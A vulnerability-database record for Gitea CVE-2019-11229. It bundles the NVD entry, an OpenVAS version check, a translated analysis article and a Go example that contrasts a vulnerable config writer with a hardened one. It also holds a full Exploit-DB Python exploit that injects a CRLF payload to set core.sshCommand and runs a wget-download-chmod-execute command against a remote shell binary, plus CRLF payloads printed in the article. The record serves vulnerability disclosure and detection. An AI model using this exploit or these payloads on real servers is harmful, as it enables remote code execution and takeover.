{"cve": [{"lastseen": "2021-01-08T14:20:40", "description": "models/repo_mirror.go in Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings, leading to remote code execution.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-15T12:31:00", "title": "CVE-2019-11229", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11229"], "modified": "2021-01-07T19:15:00", "cpe": ["cpe:/a:gitea:gitea:1.8.0"], "id": "CVE-2019-11229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11229", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gitea:gitea:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:gitea:gitea:1.8.0:rc1:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2021-01-06T16:29:45", "description": "", "published": "2021-01-06T00:00:00", "type": "exploitdb", "title": "Gitea 1.7.5 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11229"], "modified": "2021-01-06T00:00:00", "id": "EDB-ID:49383", "href": "https://www.exploit-db.com/exploits/49383", "sourceData": 
"# Exploit Title: Gitea 1.7.5 - Remote Code Execution\r\n# Date: 2020-05-11\r\n# Exploit Author: 1F98D\r\n# Original Author: LoRexxar\r\n# Software Link: https://gitea.io/en-us/\r\n# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3\r\n# Tested on: Debian 9.11 (x64)\r\n# CVE: CVE-2019-11229\r\n# References:\r\n# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa\r\n#\r\n# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,\r\n# leading to authenticated remote code execution.\r\n# \r\n#!/usr/bin/python3\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport random\r\nimport string\r\nimport requests\r\nimport tempfile\r\nimport threading\r\nimport http.server\r\nimport socketserver\r\nimport urllib.parse\r\nfrom functools import partial\r\n\r\nUSERNAME = \"test\"\r\nPASSWORD = \"password123\"\r\nHOST_ADDR = '192.168.1.1'\r\nHOST_PORT = 3000\r\nURL = 'http://192.168.1.2:3000' \r\nCMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' \r\n \r\n# Login \r\ns = requests.Session() \r\nprint('Logging in') \r\nbody = { \r\n 'user_name': USERNAME, \r\n 'password': PASSWORD \r\n} \r\nr = s.post(URL + '/user/login',data=body) \r\nif r.status_code != 200: \r\n print('Login unsuccessful') \r\n \r\n sys.exit(1) \r\nprint('Logged in successfully') \r\n\r\n# Obtain user ID for future requests\r\nprint('Retrieving user ID')\r\nr = s.get(URL + '/')\r\nif r.status_code != 200:\r\n print('Could not retrieve user ID')\r\n sys.exit(1)\r\n\r\nm = re.compile(\"<meta name=\\\"_uid\\\" content=\\\"(.+)\\\" />\").search(r.text)\r\nUSER_ID = m.group(1)\r\nprint('Retrieved user ID: {}'.format(USER_ID))\r\n\r\n# Hosting the repository to clone\r\ngitTemp = tempfile.mkdtemp()\r\nos.system('cd {} && git init'.format(gitTemp))\r\nos.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m 
x'.format(gitTemp))\r\nos.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))\r\nos.system('cd {}.git && git update-server-info'.format(gitTemp))\r\nhandler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')\r\nsocketserver.TCPServer.allow_reuse_address = True\r\nhttpd = socketserver.TCPServer((\"\", HOST_PORT), handler)\r\nt = threading.Thread(target=httpd.serve_forever)\r\nt.start()\r\nprint('Created temporary git server to host {}.git'.format(gitTemp))\r\n\r\n# Create the repository\r\nprint('Creating repository')\r\nREPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\r\nbody = {\r\n '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),\r\n 'uid': USER_ID,\r\n 'repo_name': REPO_NAME,\r\n 'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),\r\n 'mirror': 'on'\r\n}\r\nr = s.post(URL + '/repo/migrate', data=body)\r\nif r.status_code != 200:\r\n print('Error creating repo')\r\n httpd.shutdown()\r\n t.join()\r\n sys.exit(1)\r\nprint('Repo \"{}\" created'.format(REPO_NAME))\r\n\r\n# Inject command into config file\r\nprint('Injecting command into repo')\r\nbody = {\r\n '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),\r\n 'mirror_address': 'ssh://example.com/x/x\"\"\"\\r\\n[core]\\r\\nsshCommand=\"{}\"\\r\\na=\"\"\"'.format(CMD),\r\n 'action': 'mirror',\r\n 'enable_prune': 'on',\r\n 'interval': '8h0m0s'\r\n}\r\nr = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)\r\nif r.status_code != 200:\r\n print('Error injecting command')\r\n httpd.shutdown()\r\n t.join()\r\n sys.exit(1)\r\nprint('Command injected')\r\n\r\n# Trigger the command\r\nprint('Triggering command')\r\nbody = {\r\n '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),\r\n 'action': 'mirror-sync'\r\n}\r\nr = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)\r\nif r.status_code != 200:\r\n print('Error triggering command')\r\n httpd.shutdown()\r\n t.join()\r\n 
sys.exit(1)\r\n\r\nprint('Command triggered')\r\n\r\n# Shutdown the git server\r\nhttpd.shutdown()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49383"}], "openvas": [{"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11229", "CVE-2019-11228"], "description": "Gitea is prone to multiple vulnerabilities.", "modified": "2019-04-25T00:00:00", "published": "2019-04-25T00:00:00", "id": "OPENVAS:1361412562310142305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142305", "type": "openvas", "title": "Gitea < 1.7.6 or < 1.8.0-rc3 Remote Code Execution Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:gitea:gitea\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142305\");\n script_version(\"2019-04-25T08:58:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-25 08:58:41 +0000 (Thu, 25 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-25 08:34:13 +0000 (Thu, 25 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-11228\", \"CVE-2019-11229\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Gitea < 1.7.6 or < 1.8.0-rc3 Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_gitea_detect.nasl\");\n script_mandatory_keys(\"gitea/detected\");\n\n script_tag(name:\"summary\", value:\"Gitea is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Gitea is prone to multiple vulnerabilities:\n\n - repo/setting.go does not validate the form.MirrorAddress before calling SaveAddress (CVE-2019-11228)\n\n - models/repo_mirror.go mishandles mirror repo URL settings, leading to remote code execution (CVE-2019-11229)\");\n\n script_tag(name:\"affected\", value:\"Gitea versions prior to 1.7.6 and 1.8.x before 1.8-rc3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.7.6, 1.8-rc3 or later.\");\n\n script_xref(name:\"URL\", 
value:\"https://github.com/go-gitea/gitea/releases/tag/v1.7.6\");\n script_xref(name:\"URL\", value:\"https://github.com/go-gitea/gitea/releases/tag/v1.8.0-rc3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"1.7.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.7.6\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"1.8.0.rc1\", test_version2: \"1.8.0.rc2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.8.0.rc3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-07-24T18:35:58", "bulletinFamily": "info", "cvelist": [], "description": "On 15 April 2019 a vulnerability in Gitea was disclosed. Since it happened to arrive at a time when I was curious, I went ahead and studied it a bit. The vulnerability description reads:\nmodels/repo_mirror.go in Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings, leading to remote code execution.\nResearching it together with my friend @hammer, we succeeded in controlling the contents of the git config, but ran into difficulties on the way from git config to RCE, so it was set aside for the time being. A few months later, inspired by @Lz1y and @x1nGuang, I managed to reproduce the vulnerability; here we study the issue carefully.\n\nPatch analysis\nFirst, from the CVE information, we determine that the vulnerability was fixed in 1.7.6 and 1.8.0-rc3:\nhttps://github.com/go-gitea/gitea/releases/tag/v1.7.6\nhttps://github.com/go-gitea/gitea/releases/tag/v1.8.0-rc3\nUsing the file name repo_mirror.go from the vulnerability description we can pin down the commits of the fix; they belong mainly to #6593 and #6595:\nhttps://github.com/go-gitea/gitea/pull/6595/commits/52af826a7aa1df6ab538d881db236698cb367cd7\nFrom the patch the key point can roughly be located:\n/models/repo_mirror.go\nWhen the repository is a mirror repository, the settings page shows the mirror configuration:\nif !repo.IsMirror {\n ctx.NotFound(\"\", nil)\n return\n}\nThe patch replaces the original code, which modified the url option in the config file directly, with a NewCommand call (that is, it lets the git binary write the setting). This is easy to understand: writing the file is replaced by executing a command. The fix presumably takes this route because the direct file write could not be made safe, which in turn shows that the url can be passed %0d%0a to produce a line break and thereby modify other settings in the config.\n\nControlling gitconfig\nFollowing the logic above, we first create a new mirror repository.\nCapture the request and modify the mirror_address attribute accordingly:\nmirror_address=https%3A%2F%2Ftest%3A%40github.com%2FLoRexxar%2Ftest_for_gitea.git\"\"\"%0d%0a[core]%0d%0atest=/tmp%0d%0aa=\"\"\"\nAll kinds of configuration can be passed in; the contents of the config file are under our control.\nMore interesting is that if you update the synchronization settings, the server reformats the configuration file.\n\nFurther exploitation\nWhat matters is how to get from a controllable config file to an actual exploit.\nFirst, the git server side only keeps the .git contents, not a complete repository like the one our client uses, so introducing an external file is difficult. Otherwise we could point the hooks directory at it to achieve RCE; the key to this idea is finding a controllable file write or file upload.\nSecond, another idea is to look for a configuration option that executes commands, and for a way to trigger that configuration remotely.\nhttps://git-scm.com/docs/git-config\n\nRCE by writing a file into the git hooks path\nGit has a feature called Git Hooks: when certain operations are processed, the corresponding hook runs the corresponding script.\nIn the web interface only the Gitea administrator can manage git hooks, so as an ordinary user we cannot directly edit the hook scripts.\nBut we can control the git config to change the directory in which the hooks are stored.\nWhen we send\nmirror_address=https%3A%2F%2Fgithub.com%2FLoRexxar%2Ftest_for_gitea.git\"\"\"%0d%0a[core]%0d%0ahooksPath=/tmp%0d%0aa=\"\"\"\nthe server-side config file becomes:\n(screenshot omitted; the article continues in 95191_2.htm)\n", "edition": 1, "modified": "2019-07-24T00:00:00", "published": "2019-07-24T00:00:00", "id": "MYHACK58:62201995191", "href": "http://www.myhack58.com/Article/html/3/62/2019/95191.htm", "title": "CVE-2019-11229 detailed analysis: from controllable git config to RCE (vulnerability warning, myhack58)", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}]}
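The injection described in the analysis and used by the exploit above (a mirror URL carrying %0d%0a that spills a new [core] section with hooksPath or sshCommand into .git/config) reconstructed as an added example in Go. This is not Gitea's code and not the article author's; it assumes a hypothetical naive writer that concatenates the remote URL into the config file unescaped, a hardened writer that rejects control characters and unknown schemes, and a small git-config reader to show which keys git would end up seeing. The ini-library quoting that the article's `"""` trick works around is not modelled, so the constructed payload here is the bare line-break injection.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Config is a flattened view of a git-style config: "section.subsection.key" -> value.
type Config map[string]string

// renderConfigVulnerable writes a minimal .git/config for a mirror the way a naive
// writer would: the remote URL is concatenated into the file unescaped. This is a
// hypothetical reconstruction of the vulnerable pattern, not Gitea's actual code.
func renderConfigVulnerable(remoteURL string) string {
	return "[core]\n\tbare = true\n" +
		"[remote \"origin\"]\n\turl = " + remoteURL + "\n" +
		"\tfetch = +refs/heads/*:refs/heads/*\n"
}

// validateMirrorAddress is the hardened counterpart: refuse anything that could
// end the value or start a new line, and require a parseable URL with a known
// scheme and a host. The accepted scheme list is an assumption for this example.
func validateMirrorAddress(addr string) error {
	if strings.ContainsAny(addr, "\r\n\x00") {
		return errors.New("mirror address contains control characters")
	}
	u, err := url.Parse(addr)
	if err != nil {
		return fmt.Errorf("mirror address is not a URL: %w", err)
	}
	switch u.Scheme {
	case "http", "https", "git", "ssh":
	default:
		return fmt.Errorf("unsupported scheme %q", u.Scheme)
	}
	if u.Host == "" {
		return errors.New("mirror address has no host")
	}
	return nil
}

// renderConfigHardened validates first, then writes the same layout.
func renderConfigHardened(remoteURL string) (string, error) {
	if err := validateMirrorAddress(remoteURL); err != nil {
		return "", err
	}
	return renderConfigVulnerable(remoteURL), nil
}

// parseConfig is a small git-config reader (sections in [brackets], key = value
// lines, # or ; comments). Key names are lower-cased because git treats them
// case-insensitively; this is enough to show which keys git would see.
func parseConfig(text string) Config {
	cfg := Config{}
	section := ""
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text()) // also drops the \r of a CRLF line
		if line == "" || line[0] == '#' || line[0] == ';' {
			continue
		}
		if strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]") {
			inner := strings.ReplaceAll(line[1:len(line)-1], "\"", "")
			section = strings.Join(strings.Fields(inner), ".") // [remote "origin"] -> remote.origin
			continue
		}
		kv := strings.SplitN(line, "=", 2)
		if len(kv) != 2 {
			continue
		}
		cfg[section+"."+strings.ToLower(strings.TrimSpace(kv[0]))] = strings.TrimSpace(kv[1])
	}
	return cfg
}

// Demo feeds a constructed payload modelled on the article's mirror_address
// through both writers. It returns the core.hooksPath and core.sshCommand values
// the vulnerable writer leaks into the config, and whether the hardened writer
// rejected the payload.
func Demo() (hooksPath, sshCommand string, rejected bool) {
	payload := "https://github.com/LoRexxar/test_for_gitea.git\r\n" +
		"[core]\r\n" +
		"hooksPath = /tmp\r\n" +
		"sshCommand = id > /tmp/pwned\r\n"
	cfg := parseConfig(renderConfigVulnerable(payload))
	_, err := renderConfigHardened(payload)
	return cfg["core.hookspath"], cfg["core.sshcommand"], err != nil
}

func main() {
	hp, sc, rejected := Demo()
	fmt.Printf("vulnerable writer: core.hooksPath=%q core.sshCommand=%q\n", hp, sc)
	fmt.Printf("hardened writer rejected payload: %v\n", rejected)
}
```

With the vulnerable writer the parsed config contains core.hooksPath=/tmp and core.sshCommand=id > /tmp/pwned, which is exactly what the exploit relies on (git honours core.sshCommand on the next ssh:// mirror sync). The hardened writer never gets that far. Rejecting CR and LF is the minimum; the fix described in the analysis goes further by handing the write to the git binary, whose own config writer escapes a newline inside a value as \n, so the line break can never open a new section.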